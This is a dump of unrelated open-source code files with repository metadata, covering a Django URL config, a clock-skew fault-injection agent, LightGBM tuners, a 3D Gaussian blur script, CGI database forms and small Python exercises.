'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000001100000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000010000000000000001000000000000000000000000000100000000000000001111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111',
'00000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000011111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000010000001111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000001111111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111111111',
'00000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000001111111111111111111111',
'11111111111111111111111111111111111111111111111111111111111111111111111000000000000000000000000000000000001111111111111111111111',
]
|
[
"bili33@87ouo.top"
] |
bili33@87ouo.top
|
1f9e41df4cb178c1b0df2de1f4cb5f9dca1668e6
|
df52201219c5ccc4a0a4cd31ca63ef4532e0bfad
|
/Chapter5/Practice 5-1.py
|
4cf68b972114027f0273a400fa88567bb7e1dee9
|
[] |
no_license
|
Wiilz/Python-learning
|
7ac9ab2f3d1844505545a2b79d16324765cd23a4
|
aaeff2b04c7492463af43d9e921d7b1fd6e72cc1
|
refs/heads/master
| 2021-01-01T04:41:45.392318
| 2018-04-25T15:19:11
| 2018-04-25T15:19:11
| 97,226,143
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 60
|
py
|
surname = 'W'
name = 'L Z'
print "My name is",surname,name
|
[
"weiliangze@vip.qq.com"
] |
weiliangze@vip.qq.com
|
a85dbcfc2e92bd6e5126aad546f04d9e46064802
|
ec65e4109a2c89021a5cfc9f016f582512f2ec47
|
/accounting/urls.py
|
82a3ea055ed5a3aa28e283bba4ff8d1c8a88a367
|
[] |
no_license
|
numan98khan/django-school-management
|
c048067a814787c9d272745264891ecb5e6ee370
|
6e4b8013f7261f2694d013bda9999bb47cfe8b31
|
refs/heads/master
| 2022-05-01T01:29:45.294035
| 2020-01-10T11:01:02
| 2020-01-10T11:01:02
| 232,884,590
| 0
| 0
| null | 2022-04-22T22:59:01
| 2020-01-09T19:10:47
|
Python
|
UTF-8
|
Python
| false
| false
| 675
|
py
|
# Copyright (c) 2015-2019 Data King Ltd
# See LICENSE file for license details
from django.conf.urls import *
from accounting.views import *
app_name = 'accounting'
urlpatterns = (
url(
r'^account_chart/(?P<fy>\w+)/$',
AccountChartView.as_view(),
name='account_chart'
),
url(
r'^general-ledger/(?P<fy>\w+)/$',
GeneralLedgerView.as_view(),
name='general_ledger'
),
url(
r'^general-journal/(?P<fy>\w+)/$',
JournalView.as_view(),
name='general_journal'
),
url(
r'^journal/(?P<fy>\w+)/(?P<code>[^/]+)/$',
JournalView.as_view(),
name='journal'
)
)
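# Hedged usage sketch (not part of the original file; the fiscal-year value
# and the final path prefix are illustrative, since they depend on where this
# urlconf is included). With app_name set, routes reverse via the namespace:
#
# from django.urls import reverse
# reverse('accounting:general_ledger', kwargs={'fy': '2019'})
# reverse('accounting:journal', kwargs={'fy': '2019', 'code': 'AR'})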
|
[
"numan98khan@gmail.com"
] |
numan98khan@gmail.com
|
cd93efb9b02731868665558f6d1fdbf55006f759
|
d4f6ab598aa54195db8c9140d227be77d8ec343e
|
/mangle-infra-agent/Faults/ClockSkewFault.py
|
a7529c14df88dcf5cff32ec14d16bf770d040a57
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
James-libangjian/mangle
|
956a94f90dc2a3ff4e5d5b352e25a8c57acb5cfb
|
f5012f4cfecfd8c8a9248159bcfc9423bd632f5d
|
refs/heads/master
| 2023-08-21T13:26:36.776623
| 2021-09-20T05:43:10
| 2021-09-20T05:43:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,614
|
py
|
from Faults import InfraFault
from Faults import FaultStatus
from multiprocessing import Process
import time
import psutil
import sys
import subprocess
import distro
import datetime
import logging
log = logging.getLogger("python_agent")
class ClockSkewFault(InfraFault.InfraFault):
def __init__(self, fault_args):
super().__init__(fault_args)
self.processes = []
self.stop_cmd=""
self.remediate_cmd = ""
self.status_cmd = ""
self.time_before_injection=''
self.option=""
def prereq_check(self):
pre_req_error_msg = ''
dist = distro.linux_distribution(full_distribution_name=False)[0]
log.info("distro:{}".format(str(distro.linux_distribution(full_distribution_name=False))))
log.info("distro:{}".format(str(dist)))
if 'ubuntu' in dist:
self.stop_cmd = 'service ntp stop'
self.remediate_cmd = 'service ntp restart'
self.status_cmd = "service ntp status"
elif 'centos' in dist or 'rhel' in dist:
self.stop_cmd = "service ntpd stop"
self.remediate_cmd = "service ntpd restart"
self.status_cmd = "service ntpd status"
elif 'fedora' in dist or 'sles' in dist:
self.stop_cmd = "systemctl stop ntpd"
self.remediate_cmd = "systemctl restart ntpd"
self.status_cmd = "systemctl status ntpd"
elif 'photon' in dist:
self.stop_cmd = "systemctl stop systemd-timesyncd"
self.remediate_cmd = "systemctl restart systemd-timesyncd"
self.status_cmd = "systemctl status systemd-timesyncd --no-pager"
else:
log.info("Mangle doesn't support TimesSkew on the provided OS.")
pre_req_error_msg = 'Mangle does not support TimesSkew on the provided OS.,'
if len(self.status_cmd) != 0:
status_res_code = subprocess.call(self.status_cmd,shell=True)
if status_res_code != 0:
pre_req_error_msg = pre_req_error_msg + "NTP is not configured on the system"
if self.fault_args.get("--type") == "FUTURE":
self.option = "+"
elif self.fault_args.get("--type") == "PAST":
self.option = "-"
else:
pre_req_error_msg += "Wrong type argument provided"
if len(pre_req_error_msg) > 0:
return pre_req_error_msg
def get_status(self, fault_id):
if self.faultinfo.status == FaultStatus.FaultStatus.COMPLETED.name:
return self.faultinfo.status
log.info("status of {} is {}".format(fault_id, self.faultinfo.status))
current_time=''
if len(self.status_cmd) != 0:
try:
subprocess.call(self.status_cmd,shell=True)
log.info("Status check succesfull and fault is in progress")
current_time = "time after injection of fault is {}".format(datetime.datetime.now())
except subprocess.CalledProcessError as err:
raise RuntimeError("Checking status failed.\n"
"\tGot exit code {err.returncode}. Msg: {err.output}") from err
return self.faultinfo.status + " ".join(str(x) for x in self.faultinfo.activity) + \
"Before injection: {}".format(self.time_before_injection) + "After Injection: " + current_time
def remediate(self):
log.info("Remediation is triggered")
#kill child processes and terminate process
for p in self.processes:
log.info("Process id : {}".format(p.pid))
parent = psutil.Process(p.pid)
log.info("Number of child Process for {} is".format(parent.name(), len(parent.children(recursive=False))))
for child in parent.children(recursive=True):
child.kill()
p.terminate()
if len(self.remediate_cmd) != 0 :
stop_cmd_return = subprocess.call(self.remediate_cmd,shell=True)
if stop_cmd_return == 0:
log.info("Remediation succesfull : ntp service restored")
self.faultinfo.status = FaultStatus.FaultStatus.COMPLETED.name
else:
self.faultinfo.status = FaultStatus.FaultStatus.REMEDIATION_FAILED.name
def trigger_injection(self):
log.info("Injecting Clock skew")
d = "{}{} days".format(self.option,self.fault_args.get("--days"))
h = "{}{} hours".format(self.option,self.fault_args.get("--hours"))
m = "{}{} minutes".format(self.option, self.fault_args.get("--minutes"))
s = "{}{} seconds".format(self.option, self.fault_args.get("--seconds"))
date_cmd='date -d "{} {} {} {}"'.format(d,h,m,s)
self.time_before_injection = datetime.datetime.now()
log.info("Creating process.")
log.info("Date command : {}".format(date_cmd))
log.info("stop_cmd command :".format(self.stop_cmd))
log.info("remediate_cmd command.".format(self.remediate_cmd))
p1 = Process(target=inject_clock_skew,args=(self.fault_args.get("--timeout"), date_cmd,
self.stop_cmd))
self.processes.append(p1)
p1.start()
def inject_clock_skew(time_out,date_cmd,stop_cmd):
print(stop_cmd)
stop_cmd_return = subprocess.run(stop_cmd,shell=True)
log.info("Date will be changed according to input: {}".format(date_cmd))
log.info("stop_cmd_return code:{}".format(stop_cmd_return))
if stop_cmd_return.returncode == 0:
try:
date_value = subprocess.check_output(date_cmd, shell=True).decode(sys.stdout.encoding).strip()
log.info("Date will be set to: {}".format(str(date_value)))
except subprocess.CalledProcessError as err:
raise RuntimeError("Date creation failed.\n"
"\tGot exit code {err.returncode}. Msg: {err.output}") from err
date_cmd_return = subprocess.run('date -s "{}"'.format(date_value),shell=True )
if date_cmd_return.returncode == 0:
time.sleep(round(float(time_out)/1000))
if __name__ == '__main__':
fault_args = {'--operation': 'inject', '--faultname': "clockSkewFault","--faultId": "abcdefgclock" ,"--timeout":"12000",
"--days": "1", "--hours":"1","--minutes":"1","--seconds":"10", "--type": "FUTURE"}
clockSkewFault= ClockSkewFault(fault_args)
clockSkewFault.trigger_injection()
print("fault triggered")
|
[
"ashrimali@vmware.com"
] |
ashrimali@vmware.com
|
ef229ec59ceb4d8d92a729d7f17f0871bdfee2d2
|
fb1e073983243a9eaa9529569b46d618f71b1187
|
/firstPython.py
|
d0bfe1e2aaf547f26f7701b4f07ec8bcfac7c853
|
[] |
no_license
|
chanderbijlani/test_repo
|
4560f362f50490df9072ae14ecf78d4f7ef4a450
|
9ddfa01a70e4f0d910a24b5d73be1172fbf57f2e
|
refs/heads/master
| 2022-12-08T18:39:10.177625
| 2020-09-18T18:41:54
| 2020-09-18T18:41:54
| 296,657,304
| 0
| 0
| null | 2020-09-18T18:41:55
| 2020-09-18T15:17:19
|
Python
|
UTF-8
|
Python
| false
| false
| 50
|
py
|
## My First python code
print("New Python File")
|
[
"noreply@github.com"
] |
chanderbijlani.noreply@github.com
|
23fe9c349d2bea9ee5b6c6cb3a0e3e09e58d4c6c
|
643a8e5b1cd0b0ec69f3cb4b0f65075f1be17ec8
|
/cpu_usage.py
|
7d22472d8b12c3ea811a87b8b405c98a88641fc6
|
[] |
no_license
|
itsayushisaxena/Python_Utilities
|
01b36d8fc4b8aed765a34f10f16eb1128691c5c7
|
58378157526d900b91759a18cfad8be9d13158c1
|
refs/heads/master
| 2022-06-12T23:07:41.434551
| 2020-05-06T20:05:48
| 2020-05-06T20:05:48
| 261,845,145
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 931
|
py
|
## This code checks whether the CPU is under too much load or not
import psutil
#psutil (python system and process utilities) is a cross-platform
#library for retrieving information on running processes and
#system utilization (CPU, memory, disks, network, sensors) in Python.
def check_cpu_usage(percent):
#cpu_percent() return a float representing the current system-wide
#CPU utilization as a percentage.
usage = psutil.cpu_percent(interval = 1)
print("DEBUG: usage:{}".format(usage))
return usage < percent
if not check_cpu_usage(75):
print("ERROR!CPU is overloaded")
else:
print("Everything ok")
# gives a single float value
print(psutil.cpu_percent())
# gives an object with many fields
print(psutil.virtual_memory()) #physical memory usage
# you can convert that object to a dictionary
print(dict(psutil.virtual_memory()._asdict()))
print('memory % used:', psutil.virtual_memory()[2])
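# A minimal monitoring-loop sketch (an assumption, not part of the original
# script): re-run the threshold check periodically instead of once.
# import time
# while True:
#     if not check_cpu_usage(75):
#         print("ERROR! CPU is overloaded")
#     time.sleep(60)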
|
[
"noreply@github.com"
] |
itsayushisaxena.noreply@github.com
|
08329b9459b84578dea46f87b58ec8643041c8b8
|
584f7b51d7cd529448e2fc0147557e26931ab17e
|
/test_UsePyFFTW.py
|
5b4eb17729decdd1676234fbf4fc635aba9dee8e
|
[
"BSD-3-Clause"
] |
permissive
|
opticspy/lightpipes
|
8ca0d2221a1b893de5e51fec9061e90b9145f5f8
|
f4ffdedb3ab2f9b5ae5a9a8e37985d2a7f8bb2ef
|
refs/heads/master
| 2023-09-04T19:07:11.376631
| 2023-09-04T15:24:55
| 2023-09-04T15:24:55
| 80,127,706
| 191
| 55
|
BSD-3-Clause
| 2023-08-23T00:45:33
| 2017-01-26T15:39:28
|
Python
|
UTF-8
|
Python
| false
| false
| 460
|
py
|
#! /usr/bin/env python
"""
Script to test the new usePyFFTW option to compare pyFFTW and numpy FFT
"""
import time
from LightPipes import *
start_time = time.time()
wavelength = 500*nm
size = 25*mm
N = 1000
F=Begin(size, wavelength, N)
F=Fresnel(F, 100, usepyFFTW = True)
print(F.field[23,33])
#Fresnel: (1.0795142552372512+0.45098289321969964j)
#Forvard: (0.9865686238070652+0.16334733092228165j)
print("--- %s seconds ---" % (time.time() - start_time))
|
[
"fred511949@gmail.com"
] |
fred511949@gmail.com
|
6267d7aa1c8e47d9c979f168d10dee757731de26
|
6a08edd0e30d12eb89e8de486e2d2d0dddff74d7
|
/run_experiments/general_utils/lightgbm_optimizer.py
|
07f654e8ef7d6c22e4eed79240bb1347e38b469c
|
[] |
no_license
|
jrzaurin/tabulardl-benchmark
|
63b0fa2c046f9900a51b0223a884c475ac66b17f
|
ceb7b7f8bc90666b2d010fe570a77eb3ff2dde78
|
refs/heads/master
| 2023-05-29T11:29:30.371284
| 2021-06-12T16:32:20
| 2021-06-12T16:32:20
| 356,328,779
| 46
| 7
| null | 2021-06-10T16:44:51
| 2021-04-09T16:08:21
|
Python
|
UTF-8
|
Python
| false
| false
| 6,539
|
py
|
import warnings
from typing import Any, Dict, Optional
import lightgbm as lgb
import pandas as pd
from hyperopt import Trials, fmin, hp, space_eval, tpe
from lightgbm import Dataset as lgbDataset
from optuna.integration.lightgbm import LightGBMTunerCV
from sklearn.metrics import log_loss, mean_squared_error
warnings.filterwarnings("ignore")
class LGBOptimizerHyperopt(object):
def __init__(
self,
objective: str = "binary",
is_unbalance: bool = False,
verbose: bool = False,
num_class: Optional[int] = None,
):
self.objective = objective
if objective == "multiclass" and not num_class:
raise ValueError("num_class must be provided for multiclass problems")
self.num_class = num_class
self.is_unbalance = is_unbalance
self.verbose = verbose
self.early_stop_dict: Dict = {}
def optimize(
self,
dtrain: lgbDataset,
deval: lgbDataset,
maxevals: int = 200,
):
if self.objective == "regression":
self.best = lgb.LGBMRegressor().get_params()
else:
self.best = lgb.LGBMClassifier().get_params()
del (self.best["silent"], self.best["importance_type"])
param_space = self.hyperparameter_space()
objective = self.get_objective(dtrain, deval)
objective.i = 0
trials = Trials()
best = fmin(
fn=objective,
space=param_space,
algo=tpe.suggest,
max_evals=maxevals,
trials=trials,
verbose=self.verbose,
)
self.trials = trials
best = space_eval(param_space, trials.argmin)
best["n_estimators"] = int(best["n_estimators"])
best["num_leaves"] = int(best["num_leaves"])
best["min_child_samples"] = int(best["min_child_samples"])
best["verbose"] = -1
best["objective"] = self.objective
self.best.update(best)
def get_objective(self, dtrain: lgbDataset, deval: lgbDataset):
def objective(params: Dict[str, Any]) -> float:
# hyperopt casts as float
params["n_estimators"] = int(params["n_estimators"])
params["num_leaves"] = int(params["num_leaves"])
params["min_child_samples"] = int(params["min_child_samples"])
params["verbose"] = -1
params["seed"] = 1
params["feature_pre_filter"] = False
params["objective"] = self.objective
if self.objective != "regression":
params["is_unbalance"] = self.is_unbalance
if self.objective == "multiclass":
params["num_class"] = self.num_class
model = lgb.train(
params,
dtrain,
valid_sets=[deval],
early_stopping_rounds=50,
verbose_eval=False,
)
preds = model.predict(deval.data)
if self.objective != "regression":
score = log_loss(deval.label, preds)
elif self.objective == "regression":
score = mean_squared_error(deval.label, preds)
objective.i += 1 # type: ignore
return score
return objective
def hyperparameter_space(
self, param_space: Dict[str, Any] = None
) -> Dict[str, Any]:
space = {
"learning_rate": hp.uniform("learning_rate", 0.01, 0.3),
"n_estimators": hp.quniform("n_estimators", 100, 1000, 50),
"num_leaves": hp.quniform("num_leaves", 20, 200, 10),
"min_child_samples": hp.quniform("min_child_samples", 20, 100, 20),
"colsample_bytree": hp.uniform("colsample_bytree", 0.5, 1.0),
"reg_alpha": hp.choice(
"reg_alpha", [0.01, 0.05, 0.1, 0.2, 0.4, 1.0, 2.0, 4.0, 10.0]
),
"reg_lambda": hp.choice(
"reg_lambda", [0.01, 0.05, 0.1, 0.2, 0.4, 1.0, 2.0, 4.0, 10.0]
),
}
if param_space:
return param_space
else:
return space
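# Hedged usage sketch (an assumption; the dataset variables are illustrative).
# free_raw_data=False matters because the objective calls deval.data later:
#
# dtrain = lgbDataset(X_train, label=y_train, free_raw_data=False)
# deval = lgbDataset(X_valid, label=y_valid, free_raw_data=False)
# opt = LGBOptimizerHyperopt(objective="binary")
# opt.optimize(dtrain, deval, maxevals=100)
# print(opt.best)  # tuned LightGBM parameters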
class LGBOptimizerOptuna(object):
def __init__(
self,
objective: str = "binary",
is_unbalance: bool = False,
verbose: bool = False,
num_class: Optional[int] = None,
):
self.objective = objective
if objective == "multiclass" and not num_class:
raise ValueError("num_class must be provided for multiclass problems")
self.num_class = num_class
self.is_unbalance = is_unbalance
self.verbose = verbose
self.best: Dict[str, Any] = {} # Best hyper-parameters
def optimize(self, dtrain: lgbDataset, deval: lgbDataset):
# Define the base parameters
if self.objective == "binary":
params: Dict = {"objective": self.objective}
elif self.objective == "multiclass":
params: Dict = {"objective": self.objective, "metric": "multi_logloss"}
elif self.objective == "regression":
params: Dict = {"objective": self.objective, "metric": "rmse"}
if self.verbose:
params["verbosity"] = 1
else:
params["verbosity"] = -1
if self.objective != "regression":
params["is_unbalance"] = self.is_unbalance
if self.objective == "multiclass":
params["num_class"] = self.num_class
# Reformat the data for LightGBM cross validation method
train_set = lgb.Dataset(
data=pd.concat([dtrain.data, deval.data]).reset_index(drop=True),
label=pd.concat([dtrain.label, deval.label]).reset_index(drop=True),
categorical_feature=dtrain.categorical_feature,
free_raw_data=False,
)
train_index = range(len(dtrain.data))
valid_index = range(len(dtrain.data), len(train_set.data))
# Run the hyper-parameter tuning
self.tuner = LightGBMTunerCV(
params=params,
train_set=train_set,
folds=[(train_index, valid_index)],
verbose_eval=False,
num_boost_round=1000,
early_stopping_rounds=50,
)
self.tuner.run()
self.best = self.tuner.best_params
# since n_estimators is not among the params that Optuna optimizes we
# need to add it manually. We add a high value since it will be used
# with early_stopping_rounds
self.best["n_estimators"] = 1000 # type: ignore
|
[
"jrzaurin@gmail.com"
] |
jrzaurin@gmail.com
|
f4353e767fb70115d18ba97653112056174e70a5
|
6fecdc9fae6f7a7b89fa6101cc914557b929fcbe
|
/Part2/gaussian_blur3d_starter.py
|
ad2c3734ea1bfa0bb8c43a087d3325bbb8181e36
|
[] |
no_license
|
zzhang115/CodeChallenge
|
bee60e666f5ed17a7a0372f7d44a479b5f460b0d
|
a6ca04095771f5fa0299a0e0169d8ed83e486f55
|
refs/heads/master
| 2020-03-17T02:31:07.025144
| 2018-05-14T08:45:46
| 2018-05-14T08:45:46
| 133,193,314
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,026
|
py
|
import numpy as np
import h5py
volume = []
meta_data = {}
config = {"sigma" : 5}
input_3d = None
blurred_img = None
# load 3d volume from hdf5 file and stored in input_3d
def load_3dvolume(volume_path):
global input_3d
hdf5_file = h5py.File(volume_path, "r")
pixel_data_grp = hdf5_file["pixel_data"]
inverse_convert_pixelscale = np.iinfo(np.int16).max
for pixel_data_index in pixel_data_grp:
pixel_array = pixel_data_grp[pixel_data_index][()]
volume.append(pixel_array)
pixel_spacing_grp = hdf5_file["pixel_spacing"]
meta_data["pixel_spacing_x"] = pixel_spacing_grp["pixel_spacing_x"].value
meta_data["pixel_spacing_y"] = pixel_spacing_grp["pixel_spacing_y"].value
meta_data["pixel_spacing_z"] = pixel_spacing_grp["pixel_spacing_z"].value
hdf5_file.close()
input_3d = np.asarray(volume)
return input_3d, meta_data, config
# The Gaussian blur computes each output voxel as a weighted sum of its neighbor pixels.
# Following the formula from https://en.wikipedia.org/wiki/Gaussian_blur, this builds a
# "mask" indexed by the distance to each neighbor, filled with the normal-distribution density.
def gaussian(x_space, y_space, z_space, sigma):
gaussian = np.zeros((2 * x_space + 1, 2 * y_space + 1, 2 * z_space + 1))
row = 0
for x in range(-x_space, x_space + 1):
col = 0
for y in range(-y_space, y_space + 1):
lay = 0
for z in range(-z_space, z_space + 1):
d1 = np.power(sigma, 3) * np.power(2 * np.pi, 3 / 2)
d2 = np.exp(-(x ** 2 + y ** 2 + z ** 2) / (2 * sigma ** 2))
gaussian[row][col][lay] = (1 / d1) * d2
lay = lay + 1
col = col + 1
row = row + 1
return gaussian
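# Hedged note (an assumption, not in the starter): the mask above is not
# normalized, so the blurred volume's overall intensity can drift. A common
# fix is to rescale the kernel so its weights sum to one before convolving:
#
# mask = gaussian(10, 10, 10, config["sigma"])
# mask = mask / mask.sum()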
# Extending the 2D blur to a 3D volume took some figuring out: this function convolves
# the mask generated by gaussian() with input_3d, multiplying and summing over each
# neighborhood to produce the blurred image.
def calculate_blurred_img(img, mask):
row, col, lay = img.shape
m, n, o = mask.shape
new = np.zeros((row + m - 1, col + n - 1, lay + o -1))
n = n // 2
m = m // 2
o = o // 2
blurred_img = np.zeros(img.shape)
new[m:new.shape[0] - m, n:new.shape[1] - n, o:new.shape[2] - o] = img
for i in range(m, new.shape[0] - m):
for j in range(n, new.shape[1] - n):
for k in range(o, new.shape[2] - o):
temp = new[i - m:i + m + 1, j - n:j + n + 1, k - o:k + o + 1]
result = temp * mask
blurred_img[i - m, j - n, k - o] = result.sum()
return blurred_img
# How the per-dimension pixel spacing (in meta_data) should enter the calculation is
# worth discussing; as a personal choice, this version uses a fixed spacing when
# calculating the blurred image.
def gaussian_blur3d(input_3d: np.ndarray, meta_data: dict, config: dict) -> np.array:
# Performs 3D Gaussian blur on the input volume
mask = gaussian(10, 10, 10, config["sigma"])
blurred_img = calculate_blurred_img(input_3d, mask)
return blurred_img
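# Hedged cross-check sketch (an assumption; SciPy is not imported by the
# starter): scipy.ndimage.gaussian_filter performs the same 3D blur and can
# validate the hand-rolled version on a small volume.
#
# from scipy.ndimage import gaussian_filter
# reference = gaussian_filter(input_3d.astype(float), sigma=config["sigma"])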
# pre_gaussian_blur3d and post_gaussian_blur3d used for InterferencePipline test
def pre_gaussian_blur3d(input_volume_path):
global input_3d, meta_data, config
input_3d, meta_data, config = load_3dvolume(input_volume_path)
def run_gaussian_blur3d():
global blurred_img, input_3d, meta_data, config
blurred_img = gaussian_blur3d(input_3d, meta_data, config)
def post_gaussian_blur3d(output_volume_path):
# write blurred image to hdf5 file
hdf5_file = h5py.File(output_volume_path + "blurred_img.hdf5", "w")
pixel_data_grp = hdf5_file.create_group("pixel_data")
for i in range(len(blurred_img)):
pixel_data_grp.create_dataset("pixel_data" + str(i), dtype='f4', data=blurred_img[i])
hdf5_file.close()
if __name__ == "__main__":
pre_gaussian_blur3d("../hdf5_data/hdf5_data.hdf5")
run_gaussian_blur3d()
post_gaussian_blur3d("./")
|
[
"zzhang115@dons.usfca.edu"
] |
zzhang115@dons.usfca.edu
|
a97f9739f04df3ba4810633235975d3143dfb466
|
cad460552d69a075c6dc3595949dffdb251704a3
|
/proj3/web/tr_insform.cgi
|
c9a463ad2001708566b2f52170612066f5d61222
|
[] |
no_license
|
andretavluis/Databases
|
6d5c4779e173b58f39ad7fd12fde2a5943687ad4
|
c29d06d1485994fd5f9329408b378b69b5f231f7
|
refs/heads/main
| 2023-04-27T22:13:14.039316
| 2021-05-18T16:53:24
| 2021-05-18T16:53:24
| 368,599,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,954
|
cgi
|
#!/usr/bin/python3
import psycopg2
import login
import cgi
form = cgi.FieldStorage()
print('Content-type:text/html\n\n')
print('<html>')
print('<head>')
print('<title>Proj 3</title>')
print('</head>')
print('<body>')
# The string has the {}, the variables inside format() will replace the {}
print('<h3>Insert New Transformer Data</h3>')
# The form will send the info needed for the SQL query
print('<form action="tr_insert.cgi" method="post">')
print('<p>Transformer ID: <input type="text" name="id"/></p>')
print('<p>Primary busbar ID: <input type="text" name="pbbid"/></p>')
print('<p>Primary Voltage: <input type="number" name="pv"/></p>')
print('<p>Secondary busbar ID: <input type="text" name="sbbid"/></p>')
print('<p>Secondary Voltage: <input type="number" name="sv"/></p>')
print('<p>GPS Latitude: <input type="number" name="gpslat" step="0.000001"/></p>')
print('<p>GPS Longitude: <input type="number" name="gpslong" step="0.000001"/></p>')
print('<p><input type="submit" value="Submit"/></p>')
print('</form>')
connection = None
try:
connection = psycopg2.connect(login.credentials)
cursor = connection.cursor()
# Displaying substations
sql = 'SELECT * FROM substation;'
cursor.execute(sql)
result = cursor.fetchall()
print('<h3>Available Substations</h3>')
print('<table border="5">')
print('<tr><td>gpslat</td><td>gpslong</td><td>locality</td></tr>')
for row in result:
print('<tr>')
for value in range(len(row)-2):
print('<td>{}</td>'.format(row[value]))
print('</tr>')
print('</table>')
# Displaying busbars
sql = 'SELECT * FROM busbar;'
cursor.execute(sql)
result = cursor.fetchall()
print('<h3>Available Busbars</h3>')
print('<table border="5">')
print('<tr><td>ID</td><td>voltage</td></tr>')
for row in result:
print('<tr>')
for value in row:
print('<td>{}</td>'.format(value))
print('</tr>')
print('</table>')
# Displaying transformers
sql = 'SELECT * FROM transformer;'
cursor.execute(sql)
result = cursor.fetchall()
print('<h3>Already Existing Transformers</h3>')
print('<table border="5">')
print('<tr><td>ID</td><td>pv</td><td>sv</td><td>gpslat</td><td>gpslong</td><td>pbbid</td><td>sbbid</td></tr>')
for row in result:
print('<tr>')
for value in row:
print('<td>{}</td>'.format(value))
print('</tr>')
print('</table>')
#Closing connection
cursor.close()
except Exception as e:
print('<h1>An error occurred.</h1>')
print('<form action="page.cgi" method="get">')
print('<p><input type="submit" value="Return"/></p>')
print('</form>')
finally:
if connection is not None:
connection.close()
print('<form action="page.cgi" method="get">')
print('<p><input type="submit" value="Return"/></p>')
print('</form>')
print('</body>')
print('</html>')
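# Hedged sketch of the receiving side (hypothetical: tr_insert.cgi is not
# shown here; column order follows the transformer table header above).
# A parameterized query keeps the INSERT safe from SQL injection:
#
# form = cgi.FieldStorage()
# sql = 'INSERT INTO transformer VALUES (%s, %s, %s, %s, %s, %s, %s);'
# data = (form.getvalue('id'), form.getvalue('pv'), form.getvalue('sv'),
#         form.getvalue('gpslat'), form.getvalue('gpslong'),
#         form.getvalue('pbbid'), form.getvalue('sbbid'))
# cursor.execute(sql, data)
# connection.commit()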
|
[
"noreply@github.com"
] |
andretavluis.noreply@github.com
|
d543afbd88b02247daaffc3464471ccbfa5b366a
|
03969015ab882f4751dc0e91beeda1212babca48
|
/robot_code/Nimbus_ws/build/robotiq_85_gripper_actions/catkin_generated/pkg.develspace.context.pc.py
|
5deddba43de547be76a27e50e515649c31ddd7ff
|
[] |
no_license
|
lnairGT/Thesis_code
|
f3ad57f4344691227dcd128a741eb9c0e937738e
|
6f5dbfc2510272f294a0e9bb4273beceeacbff2a
|
refs/heads/master
| 2023-03-17T21:43:56.320553
| 2020-09-26T16:05:31
| 2020-09-26T16:05:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 388
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "robotiq_85_gripper_actions"
PROJECT_SPACE_DIR = "/home/lnair3/Nimbus_ws/devel"
PROJECT_VERSION = "0.0.1"
|
[
"lnair3@gatech.edu"
] |
lnair3@gatech.edu
|
7d08f5615033845920551fbd2d3e302e74b1b049
|
0db410b97489d2ede4b612a840b8f3cf529a8e16
|
/__init__.py
|
09ad418de8d45f030c6cddfaca804bae8906260c
|
[
"MIT"
] |
permissive
|
Desaiakshata/CovidTracker
|
a7cb98831662ff044bf7b7e331e9d282aeab212e
|
5609b67b7c48abf308e12e8d29cb7cf49cb24866
|
refs/heads/main
| 2023-06-26T20:27:12.082643
| 2021-08-04T11:18:43
| 2021-08-04T11:18:43
| 392,657,086
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 80
|
py
|
from flask import Flask
app = Flask(__name__)
from program import routes
|
[
"noreply@github.com"
] |
Desaiakshata.noreply@github.com
|
3055fa47d34910711fc7807295779602a0cc3cce
|
47fcf268ac089915e5983ff028ea58966eb75605
|
/envs_repo/inception_pytorch/utils.py
|
4711897a2f409977f277e583a139096e978a21a8
|
[] |
no_license
|
goldenair/CE-GAN
|
8e47bc09de3d0312d4b5528f35e0bbe6737218cd
|
ad8b1946fbf9c76eca7a3480bbb61d9f3121e224
|
